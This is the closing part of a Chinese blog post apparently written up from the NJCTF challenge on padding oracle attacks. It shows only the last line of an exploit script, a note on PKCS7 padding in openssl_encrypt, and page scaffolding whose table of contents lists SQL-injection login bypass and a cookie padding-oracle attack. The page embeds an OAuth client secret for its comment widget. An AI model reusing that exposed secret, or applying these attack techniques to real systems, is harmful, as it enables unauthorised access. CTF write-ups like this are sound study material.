class="keyword">print</span> resp.content</span><br></pre></td></tr></table></figure>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>openssl_encrypt() 函数 options参数为<code>OPENSSL_RAW_DATA</code>, 使用的是<code>PKCS7</code>填充模式</p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Ethan
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/" title="NJCTF Padding Oracle攻击利用">http://www.beesfun.com/2017/03/12/NJCTF-Padding-Oracle攻击利用/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CBC/" rel="tag"># CBC</a>
          
            <a href="/tags/NJCTF/" rel="tag"># NJCTF</a>
          
            <a href="/tags/Padding-Oracle/" rel="tag"># Padding Oracle</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/03/09/基于CBC模式的密文攻击/" rel="next" title="基于CBC模式模式的密文攻击">
                <i class="fa fa-chevron-left"></i> 基于CBC模式模式的密文攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/03/16/【CTF】Nodejs-Buffer-引发内存泄露/" rel="prev" title="【CTF】NodeJS Buffer()引发内存泄露">
                【CTF】NodeJS Buffer()引发内存泄露 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://avatars3.githubusercontent.com/u/15061633"
                alt="Ethan" />
            
              <p class="site-author-name" itemprop="name">Ethan</p>
              <p class="site-description motion-element" itemprop="description">personal blog :)</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">56</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/hxer/" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://badcode.cc/" title="badcode" target="_blank">badcode</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.wupco.cn" title="wupco" target="_blank">wupco</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://danaive.github.io" title="danlei" target="_blank">danlei</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#简要介绍"><span class="nav-number">1.</span> <span class="nav-text">简要介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入-弱类型比较绕过登录"><span class="nav-number">2.</span> <span class="nav-text">SQL注入+弱类型比较绕过登录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Padding-Oracle攻击位置cookie"><span class="nav-number">3.</span> <span class="nav-text">Padding Oracle攻击位置cookie</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后记"><span class="nav-number">4.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ethan</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        




  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=63078337";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1489303493000', 
            owner: 'hxer',
            repo: 'blogComment',
            
            lang: "zh-Hans" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: '7147116f4ae9df31961313af13fad164bdbf0fe3',
            
                client_id: 'ac1236f9efefa7d5580f'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  

  

  
  

  

  

  

</body>
</html>
